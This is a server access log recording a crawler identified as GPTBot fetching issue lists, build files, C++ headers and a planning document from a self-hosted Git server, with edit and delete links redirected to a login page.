+[17/Feb/2026:17:46:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:17:46:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake?display=source" [Client 74.7.227.38] [Length 11747] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:17:46:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake?display=source" [Client 74.7.227.38] [Length 11746] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:17:46:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d?display=rendered" [Client 74.7.227.38] [Length 11153] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:17:46:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make?display=source" [Client 74.7.227.38] [Length 16074] [Gzip 5.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:17:46:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d?display=rendered" [Client 74.7.227.38] [Length 11152] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:17:46:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts?display=source" [Client 74.7.227.38] [Length 11383] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:17:46:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt?display=source" [Client 74.7.227.38] [Length 11317] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:17:46:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d?display=source" [Client 74.7.227.38] [Length 13194] [Gzip 4.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:17:46:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt?display=rendered" [Client 74.7.227.38] [Length 11151] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:17:46:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d?display=source" [Client 74.7.227.38] [Length 13193] [Gzip 4.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:17:46:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make?display=source" [Client 74.7.227.38] [Length 11667] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:17:46:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make?display=source" [Client 74.7.227.38] [Length 16071] [Gzip 5.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:17:46:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make?display=source" [Client 74.7.227.38] [Length 11668] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:17:46:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts?display=source" [Client 74.7.227.38] [Length 11385] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:17:46:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt?display=rendered" [Client 74.7.227.38] [Length 11152] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:17:46:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt?display=source" [Client 74.7.227.38] [Length 11316] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:17:46:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 20569] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project" +[17/Feb/2026:17:46:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=oldest&state=open&type=all" +[17/Feb/2026:17:46:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 9880] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:17:46:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldPilot/.vscode/settings.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/.vscode/settings.json" +[17/Feb/2026:17:46:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldPilot/.vscode/settings.json" +[17/Feb/2026:17:46:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresWatchdog/.vscode/tasks.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/.vscode/tasks.json" +[17/Feb/2026:17:46:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresWatchdog/.vscode/tasks.json" +[17/Feb/2026:17:46:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10145] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&state=all&type=all" +[17/Feb/2026:17:46:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9968] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&state=all&type=all" +[17/Feb/2026:17:46:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9964] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&state=all&type=all" +[17/Feb/2026:17:46:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/metadata.json?display=source" [Client 74.7.227.38] [Length 11318] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/metadata.json" +[17/Feb/2026:17:46:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/status.json?display=rendered" [Client 74.7.227.38] [Length 10915] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/status.json" +[17/Feb/2026:17:46:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10078] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:17:46:19 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/Project%20Planning-1.md" +[17/Feb/2026:17:46:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/Project%20Planning-1.md" +[17/Feb/2026:17:46:20 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/Project%20Planning-1.md" +[17/Feb/2026:17:46:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/Project%20Planning-1.md" +[17/Feb/2026:17:46:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 9842] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/Project%20Planning-1.md" +[17/Feb/2026:17:46:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 990] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/Project%20Planning-1.md" +[17/Feb/2026:17:46:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 43341] [Gzip 20.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/Project%20Planning-1.md" +[17/Feb/2026:17:46:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10081] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:17:46:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp?display=rendered" [Client 74.7.227.38] [Length 11083] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:17:46:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/data_format.hpp?display=rendered" [Client 74.7.227.38] [Length 11049] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:17:46:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11082] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:17:46:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/data_format.hpp?display=rendered" [Client 74.7.227.38] [Length 11048] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:17:46:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11082] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:17:46:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp?display=rendered" [Client 74.7.227.38] [Length 11083] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:17:46:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/data_format.hpp?display=rendered" [Client 74.7.227.38] [Length 11045] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:17:46:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13011] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:17:46:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13011] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:17:46:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/Project%20Planning-1.md" +[17/Feb/2026:17:46:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/Project%20Planning-1.md" +[17/Feb/2026:17:46:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/Project%20Planning-1.md" +[17/Feb/2026:17:46:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/Project%20Planning-1.md" +[17/Feb/2026:17:46:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 12964] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:17:46:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/Project%20Planning-1.md?display=rendered" [Client 